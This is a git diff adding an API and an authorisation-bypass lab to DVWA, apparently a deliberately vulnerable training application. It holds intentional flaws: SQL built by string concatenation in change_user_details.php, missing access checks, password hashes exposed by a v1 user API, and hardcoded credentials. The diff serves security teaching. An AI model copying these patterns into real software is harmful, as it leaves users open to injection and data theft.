response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + + private function getStatus() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("status" => "OK")); + return $response; + } + + #[OAT\Get( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/ping', + operationId: 'ping', + description: 'Simple ping/pong to check connectivity.', + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + private function ping() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("Ping" => "Pong")); + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'POST': + switch ($this->command) { + case "echo": + $response = $this->echo(); + break; + case "connectivity": + $response = $this->checkConnectivity(); + break; + default: + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + }; + break; + case 'GET': + switch ($this->command) { + case "status": + $response = $this->getStatus(); + break; + case "ping": + $response = $this->ping(); + break; + default: + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + }; + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} + +#[OAT\Schema(required: ['target'])] +final class Target { + #[OAT\Property(example: "digi.ninja")] + public string $target; +} + +#[OAT\Schema(required: ['words'])] +final class Words { + #[OAT\Property(example: "Hello World")] + public string $words; +} + diff --git a/DVWA/vulnerabilities/api/src/Helpers.php b/DVWA/vulnerabilities/api/src/Helpers.php new file mode 100644 index 00000000..d7d5a59b --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Helpers.php @@ -0,0 +1,15 @@ + "Invalid content type, expected JSON")); + return $response; + } + } +} diff --git a/DVWA/vulnerabilities/api/src/Login.php b/DVWA/vulnerabilities/api/src/Login.php new file mode 100644 index 00000000..8b82f620 --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Login.php @@ -0,0 +1,48 @@ + $tokenObj->create_token(self::ACCESS_TOKEN_SECRET, $now + self::ACCESS_TOKEN_LIFE), + "refresh_token" => $tokenObj->create_token(self::REFRESH_TOKEN_SECRET, $now + self::REFRESH_TOKEN_LIFE), + "token_type" => "bearer", + "expires_in" => self::ACCESS_TOKEN_LIFE) + ); + return $token; + } + + public static function check_access_token($token) { + $tokenObj = new Token(); + $decrypted = $tokenObj->decrypt_token ($token); + + if ($decrypted === false) { + return false; + } + if ($decrypted['secret'] == self::ACCESS_TOKEN_SECRET && $decrypted['expires'] > time()) { + return true; + } + return false; + } + + public static function check_refresh_token($token) { + $tokenObj = new Token(); + $decrypted = $tokenObj->decrypt_token ($token); + + if ($decrypted['secret'] == self::REFRESH_TOKEN_SECRET && $decrypted['expires'] > time()) { + return true; + } + return false; + } +} diff --git a/DVWA/vulnerabilities/api/src/LoginController.php b/DVWA/vulnerabilities/api/src/LoginController.php new file mode 100644 index 00000000..fa3e34fd --- /dev/null +++ b/DVWA/vulnerabilities/api/src/LoginController.php @@ -0,0 +1,282 @@ +requestMethod = $requestMethod; + $this->command = $command; + } + + # + # Add one of these for refresh + # + #[OAT\Post( + tags: ["login"], + path: '/vulnerabilities/api/v2/login/login', + operationId: 'login', + description: 'Login as user.', + parameters: [ + new OAT\RequestBody ( + description: 'The login credentials.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Credentials::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 401, + description: 'Invalid credentials.', + ), + ] + ) + ] + + private function loginJSON() { + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("username", $input) && + array_key_exists ("password", $input)) { + $username = $input['username']; + $password = $input['password']; + + if ($username == "mrbennett" && $password == "becareful") { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("token" => Login::create_token())); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid credentials")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing credentials")); + } + return $response; + } + + # This is an attempt at an OAUTH2 client password authentication flow + private function login() { + # Default fail, just in case. + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Authentication failed")); + + if (array_key_exists ("PHP_AUTH_USER", $_SERVER) && + array_key_exists ("PHP_AUTH_PW", $_SERVER)) { + $client_id = $_SERVER['PHP_AUTH_USER']; + $client_secret = $_SERVER['PHP_AUTH_PW']; + + # App auth check + if ($client_id == "1471.dvwa.digi.ninja" && $client_secret == "ABigLongSecret") { + + if (array_key_exists ("grant_type", $_POST)) { + switch ($_POST['grant_type']) { + case "password": + if (array_key_exists ("username", $_POST) && + array_key_exists ("password", $_POST)) { + $username = $_POST['username']; + $password = $_POST['password']; + + if ($username == "mrbennett" && $password == "becareful") { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = Login::create_token(); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid user credentials")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing user credentials")); + } + break; + case "refresh_token": + if (array_key_exists ("refresh_token", $_POST)) { + $refresh_token = $_POST['refresh_token']; + + # Because this is sent in a POST body, any + characters + # get replaced by a space when the URL decode happens. This + # puts them back to plus characters. + $ref = str_replace (" ", "+", $refresh_token); + + if (Login::check_refresh_token($ref)) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = Login::create_token(); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid refresh token")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing refresh token")); + } + break; + default: + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Unknown grant type")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing grant type")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid clientid/clientsecret credentials")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing clientid/clientsecret credentials")); + } + + return $response; + } + + private function refresh() { + /* + echo "Hello {$_SERVER['PHP_AUTH_USER']}.
"; + echo "You entered {$_SERVER['PHP_AUTH_PW']} as your password.
"; + */ + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("refresh_token", $input)) { + if (array_key_exists ("grant_type", $input)) { + $token = $input['token']; + if (Login::check_access_token($token)) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("token" => "Valid")); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing token")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing token")); + } + return $response; + } + + #[OAT\Post( + tags: ["login"], + path: '/vulnerabilities/api/v2/login/check_token', + operationId: 'check_token', + description: 'Check a token is valid.', + parameters: [ + new OAT\RequestBody ( + description: 'The token to test.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Token::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 401, + description: 'Token is invalid.', + ), + ] + ) + ] + + private function check_token() { + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("token", $input)) { + $token = $input['token']; + if (Login::check_access_token($token)) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("token" => "Valid")); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing token")); + } + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'POST': + switch ($this->command) { + case "refresh": + $response = $this->login(); + break; + case "login": + $response = $this->login(); + break; + case "check_token": + $response = $this->check_token(); + break; + default: + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + }; + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} + +#[OAT\Schema(required: ['username', 'password'])] +final class Credentials { + #[OAT\Property(example: "user")] + public string $username; + #[OAT\Property(example: "password")] + public string $password; +} + +/* +Moving this to its own thing +#[OAT\Schema(required: ['token'])] +final class Token { + #[OAT\Property(example: "11111")] + public string $token; +} +*/ diff --git a/DVWA/vulnerabilities/api/src/Order.php b/DVWA/vulnerabilities/api/src/Order.php new file mode 100644 index 00000000..6f96042c --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Order.php @@ -0,0 +1,80 @@ +id = $id; + $this->name = $name; + $this->address = $address; + $this->items = $items; + $this->status = $status; + } + + public function toArray($version) { + $a = array ( + "id" => $this->id, + "name" => $this->name, + "address" => $this->address, + "items" => $this->items, + "status" => $this->status, + ); + + return $a; + } +} + +#[OAT\Schema(required: ['level', 'name'])] +final class OrderAdd +{ + #[OAT\Property(example: "fred")] + public string $name; + + #[OAT\Property(example: "1 High Street, Atown")] + public string $address; + + #[OAT\Property(example: "2 * brushes")] + public string $items; +} + +#[OAT\Schema()] +final class OrderUpdate +{ + #[OAT\Property(example: "fred")] + public string $name; + + #[OAT\Property(example: "1 High Street, Atown")] + public string $address; + + #[OAT\Property(example: "2 * brushes")] + public string $items; +} diff --git a/DVWA/vulnerabilities/api/src/OrderController.php b/DVWA/vulnerabilities/api/src/OrderController.php new file mode 100644 index 00000000..eebe58cd --- /dev/null +++ b/DVWA/vulnerabilities/api/src/OrderController.php @@ -0,0 +1,337 @@ +data = array ( + 1 => new Order (1, "Tony", "BBC Television Centre, London W3 6XZ", "5 * brushes", 0), + 2 => new Order (2, "Morph", "Wooden Box, Corner of the table, The Studio", "plasticine", 0), + 3 => new Order (3, "Nailbrush", "BBC Television Centre, London W3 6XZ", "Spare bristles", 1), + ); + $this->requestMethod = $requestMethod; + $this->orderId = $orderId; + $this->version = $version; + } + + private function checkToken() { + if (array_key_exists ("HTTP_AUTHORIZATION", $_SERVER)) { + $header = $_SERVER['HTTP_AUTHORIZATION']; + $bits = explode (" ", $header); + if (count ($bits) == 2) { + if (strtolower($bits[0]) == "bearer") { + return (Login::check_access_token($bits[1])); + } + } + } + + return false; + } + + private function validateAdd($input) + { + if (! isset($input['name'])) { + return false; + } + if (! isset($input['address'])) { + return false; + } + if (! isset($input['items'])) { + return false; + } + return true; + } + + private function validateUpdate($input) + { + if (isset($input['name']) || isset($input['address']) || isset ($input['items'])) { + return true; + } + return false; + } + + /* + type can be "http", "apiKey", "oauth2", "openIdConnect" + * https://zircote.github.io/swagger-php/guide/cookbook.html#referencing-a-security-scheme + */ + + #[OAT\SecurityScheme( + name :"authorization", + securityScheme :"http", + type :"http", + ) + ] + + #[OAT\Get( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/{id}', + operationId: 'getOrderByID', + description: 'Get a order by ID.', + security: [ "basicAuth" ], + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/Order'), + + ), + new OAT\Response( + response: 404, + description: 'Order not found.', + ), + ] + ) + ] + + private function getOrder($id) + { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Get( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/', + operationId: 'getOrders', + description: 'Get all orders.', + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent( + type: 'array', + items: new OAT\Items(ref: '#/components/schemas/Order') + ) + ), + ] + ) + ] + + private function getAllOrders() { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $all = array(); + foreach ($this->data as $order) { + $all[] = $order->toArray($this->version); + } + $response['body'] = json_encode($all); + return $response; + } + + #[OAT\Post( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/', + operationId: 'addOrder', + description: 'Create a new order.', + parameters: [ + new OAT\RequestBody ( + description: 'Order data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: OrderAdd::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/Order'), + ), + new OAT\Response( + response: 422, + description: 'Invalid order object provided', + ), + ] + ) + ] + + private function addOrder() + { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateAdd($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + $order = new Order(null, $input['name'], $input['address'], $input['items'], 0); + $this->data[] = $order; + $response['status_code_header'] = 'HTTP/1.1 201 Created'; + $response['body'] = json_encode($order->toArray($this->version)); + return $response; + } + + #[OAT\Put( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/{id}', + operationId: 'updateOrder', + description: 'Update an order by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + new OAT\RequestBody ( + description: 'New order data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: OrderUpdate::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/Order'), + ), + new OAT\Response( + response: 404, + description: 'Order not found', + ), + new OAT\Response( + response: 422, + description: 'Invalid order object provided', + ), + ] + ) + ] + + private function updateOrder($id) + { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateUpdate($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + if (array_key_exists ("name", $input)) { + $this->data[$id]->name = $input['name']; + } + if (array_key_exists ("address", $input)) { + $this->data[$id]->address = $input['address']; + } + if (array_key_exists ("items", $input)) { + $this->data[$id]->items = $input['items']; + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Delete( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/{id}', + operationId: 'deleteOrderById', + description: 'Delete order by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 404, + description: 'Order not found', + ), + ] + ) + ] + + private function deleteOrder($id) { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + unset ($this->data[$id]); + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = null; + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'GET': + if (isset ($this->orderId) && is_numeric ($this->orderId)) { + $response = $this->getOrder($this->orderId); + } else { + $response = $this->getAllOrders(); + }; + break; + case 'POST': + $response = $this->addOrder(); + break; + case 'PUT': + $response = $this->updateOrder($this->orderId); + break; + case 'DELETE': + $response = $this->deleteOrder($this->orderId); + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + exit(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} diff --git a/DVWA/vulnerabilities/api/src/Token.php b/DVWA/vulnerabilities/api/src/Token.php new file mode 100644 index 00000000..e9a2bd9f --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Token.php @@ -0,0 +1,62 @@ + $secret, + "expires" => $expires, + ))); + return $token; + } + + public function decrypt_token($token) { + $decrypted = self::decrypt($token); + + if ($decrypted === false) { + return false; + } + + $token = json_decode ($decrypted, true); + return $token; + } +} + +?> diff --git a/DVWA/vulnerabilities/api/src/User.php b/DVWA/vulnerabilities/api/src/User.php new file mode 100644 index 00000000..76560cba --- /dev/null +++ b/DVWA/vulnerabilities/api/src/User.php @@ -0,0 +1,77 @@ +id = $id; + $this->name = $name; + $this->level = $level; + $this->password = $password; + } + + public function toArray($version) { + switch ($version) { + case 1: + $a = array ( + "id" => $this->id, + "name" => $this->name, + "level" => $this->level, + "password" => $this->password, + ); + break; + default: + case 2: + $a = array ( + "id" => $this->id, + "name" => $this->name, + "level" => $this->level, + ); + break; + } + + return $a; + } +} + +#[OAT\Schema(required: ['level', 'name'])] +final class UserAdd +{ + #[OAT\Property(example: "fred")] + public string $name; + + #[OAT\Property(type: 'integer', example: 1)] + public string $level; +} + +#[OAT\Schema(required: ['name'])] +final class UserUpdate +{ + #[OAT\Property(example: "fred")] + public string $name; +} diff --git a/DVWA/vulnerabilities/api/src/UserController.php b/DVWA/vulnerabilities/api/src/UserController.php new file mode 100644 index 00000000..b39e968a --- /dev/null +++ b/DVWA/vulnerabilities/api/src/UserController.php @@ -0,0 +1,298 @@ +data = array ( + 1 => new User (1, "tony", 0, '1c8bfe8f801d79745c4631d09fff36c82aa37fc4cce4fc946683d7b336b63032'), + 2 => new User (2, "morph", 1, 'e5326ba4359f77c2623244acb04f6ac35c4dfca330ebcccdf9b734e5b1df90a8'), + 3 => new User (3, "chas", 1, 'a89237fc1f9dd8d424d8b8b98b890dbc4a817bfde59af17c39debcc4a14c21de'), + ); + $this->requestMethod = $requestMethod; + $this->userId = $userId; + $this->version = $version; + } + + private function validateAdd($input) + { + if (! isset($input['name'])) { + return false; + } + if (! isset($input['level'])) { + return false; + } + if (!is_numeric ($input['level'])) { + return false; + } + return true; + } + + private function validateUpdate($input) + { + if (! isset($input['name'])) { + return false; + } + return true; + } + + #[OAT\Get( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/{id}', + operationId: 'getUserByID', + description: 'Get a user by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/User'), + + ), + new OAT\Response( + response: 404, + description: 'User not found.', + ), + ] + ) + ] + + private function getUser($id) + { + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Get( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/', + operationId: 'getUsers', + description: 'Get all users.', + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent( + type: 'array', + items: new OAT\Items(ref: '#/components/schemas/User') + ) + ), + ] + ) + ] + + private function getAllUsers() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $all = array(); + foreach ($this->data as $user) { + $all[] = $user->toArray($this->version); + } + $response['body'] = json_encode($all); + return $response; + } + + #[OAT\Post( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/', + operationId: 'addUser', + description: 'Create a new user.', + parameters: [ + new OAT\RequestBody ( + description: 'User data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: UserAdd::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/User'), + ), + new OAT\Response( + response: 422, + description: 'Invalid user object provided', + ), + ] + ) + ] + + private function addUser() + { + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateAdd($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + $user = new User(null, $input['name'], intval ($input['level']), hash ("sha256", "password")); + $this->data[] = $user; + $response['status_code_header'] = 'HTTP/1.1 201 Created'; + $response['body'] = json_encode($user->toArray($this->version)); + return $response; + } + + #[OAT\Put( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/{id}', + operationId: 'updateUser', + description: 'Update a user by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + new OAT\RequestBody ( + description: 'New user data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: UserUpdate::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/User'), + ), + new OAT\Response( + response: 404, + description: 'User not found', + ), + new OAT\Response( + response: 422, + description: 'Invalid user object provided', + ), + ] + ) + ] + + private function updateUser($id) + { + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateUpdate($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + if (array_key_exists ("name", $input)) { + $this->data[$id]->name = $input['name']; + } + if (array_key_exists ("level", $input)) { + $this->data[$id]->level = intval ($input['level']); + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Delete( + tags: ["user"], + path: '/vulnerabilities/api/v2/user/{id}', + operationId: 'deleteUserById', + description: 'Delete user by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 404, + description: 'User not found', + ), + ] + ) + ] + + private function deleteUser($id) { + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + unset ($this->data[$id]); + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = null; + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'GET': + if ($this->userId) { + $response = $this->getUser($this->userId); + } else { + $response = $this->getAllUsers(); + }; + break; + case 'POST': + $response = $this->addUser(); + break; + case 'PUT': + $response = $this->updateUser($this->userId); + break; + case 'DELETE': + $response = $this->deleteUser($this->userId); + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + exit(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} diff --git a/DVWA/vulnerabilities/authbypass/authbypass.js b/DVWA/vulnerabilities/authbypass/authbypass.js new file mode 100644 index 00000000..12b35556 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/authbypass.js @@ -0,0 +1,53 @@ +function show_save_result (data) { + if (data.result == 'ok') { + document.getElementById('save_result').innerText = 'Save Successful'; + } else { + document.getElementById('save_result').innerText = 'Save Failed'; + } +} + +function submit_change(id) { + first_name = document.getElementById('first_name_' + id).value + surname = document.getElementById('surname_' + id).value + + fetch('change_user_details.php', { + method: 'POST', + headers: { + 'Accept': 'application/json', + 'Content-Type': 'application/json' + }, + body: JSON.stringify({ 'id': id, 'first_name': first_name, 'surname': surname }) + } + ) + .then((response) => response.json()) + .then((data) => show_save_result(data)); +} + +function populate_form() { + var xhr= new XMLHttpRequest(); + xhr.open('GET', 'get_user_data.php', true); + xhr.onreadystatechange= function() { + if (this.readyState!==4) { + return; + } + if (this.status!==200) { + return; + } + const users = JSON.parse (this.responseText); + table_body = document.getElementById('user_table').getElementsByTagName('tbody')[0]; + users.forEach(updateTable); + + function updateTable (user) { + var row = table_body.insertRow(0); + var cell0 = row.insertCell(-1); + cell0.innerHTML = user['user_id'] + ''; + var cell1 = row.insertCell(1); + cell1.innerHTML = ''; + var cell2 = row.insertCell(2); + cell2.innerHTML = ''; + var cell3 = row.insertCell(3); + cell3.innerHTML = ''; + } + }; + xhr.send(); +} diff --git a/DVWA/vulnerabilities/authbypass/change_user_details.php b/DVWA/vulnerabilities/authbypass/change_user_details.php new file mode 100644 index 00000000..da54d595 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/change_user_details.php @@ -0,0 +1,52 @@ + "fail", "error" => "Access denied")); + exit; +} + +if ($_SERVER['REQUEST_METHOD'] != "POST") { + $result = array ( + "result" => "fail", + "error" => "Only POST requests are accepted" + ); + echo json_encode($result); + exit; +} + +try { + $json = file_get_contents('php://input'); + $data = json_decode($json); + if (is_null ($data)) { + $result = array ( + "result" => "fail", + "error" => 'Invalid format, expecting "{id: {user ID}, first_name: "{first name}", surname: "{surname}"}' + + ); + echo json_encode($result); + exit; + } +} catch (Exception $e) { + $result = array ( + "result" => "fail", + "error" => 'Invalid format, expecting \"{id: {user ID}, first_name: "{first name}", surname: "{surname}\"}' + + ); + echo json_encode($result); + exit; +} + +$query = "UPDATE users SET first_name = '" . $data->first_name . "', last_name = '" . $data->surname . "' where user_id = " . $data->id . ""; +$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + +print json_encode (array ("result" => "ok")); +exit; +?> diff --git a/DVWA/vulnerabilities/authbypass/get_user_data.php b/DVWA/vulnerabilities/authbypass/get_user_data.php new file mode 100644 index 00000000..f2eb7c2f --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/get_user_data.php @@ -0,0 +1,42 @@ + "fail", "error" => "Access denied")); + exit; +} + +$query = "SELECT user_id, first_name, last_name FROM users"; +$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ); + +$guestbook = ''; +$users = array(); + +while ($row = mysqli_fetch_row($result) ) { + if( dvwaSecurityLevelGet() == 'impossible' ) { + $user_id = $row[0]; + $first_name = htmlspecialchars( $row[1] ); + $surname = htmlspecialchars( $row[2] ); + } else { + $user_id = $row[0]; + $first_name = $row[1]; + $surname = $row[2]; + } + + $user = array ( + "user_id" => $user_id, + "first_name" => $first_name, + "surname" => $surname + ); + $users[] = $user; +} + +print json_encode ($users); +exit; +?> diff --git a/DVWA/vulnerabilities/authbypass/help/help.php b/DVWA/vulnerabilities/authbypass/help/help.php new file mode 100644 index 00000000..61a64115 --- /dev/null +++ b/DVWA/vulnerabilities/authbypass/help/help.php @@ -0,0 +1,82 @@ +
+
+ +
diff --git a/DVWA/vulnerabilities/authbypass/index.php b/DVWA/vulnerabilities/authbypass/index.php
new file mode 100644
index 00000000..2561e885
--- /dev/null
+++ b/DVWA/vulnerabilities/authbypass/index.php
@@ -0,0 +1,77 @@
+
+ Help - Authorisation Bypass
+ +
+
+
+
+
+
+
+ About++ When developers have to build authorisation matrices into complex systems it is easy for them to miss adding the right checks in every place, especially those + which are not directly accessible through a browser, for example API calls. + + ++ As a tester, you need to be looking at every call a system makes and then testing it using every level of user to ensure that the checks are being carried out correctly. + This can often be a long and boring task, especially with a large matrix with lots of different user types, but it is critical that the testing is carried out as one missed + check could lead to an attacker gaining access to confidential data or functions. + + ++ + Objective+Your goal is to test this user management system at all four security levels to identify any areas where authorisation checks have been missed. +The system is only designed to be accessed by the admin user, so have a look at all the calls made while logged in as the admin, and then try to reproduce them while logged in as different user. +If you need a second user, you can use gordonb / abc123.
+
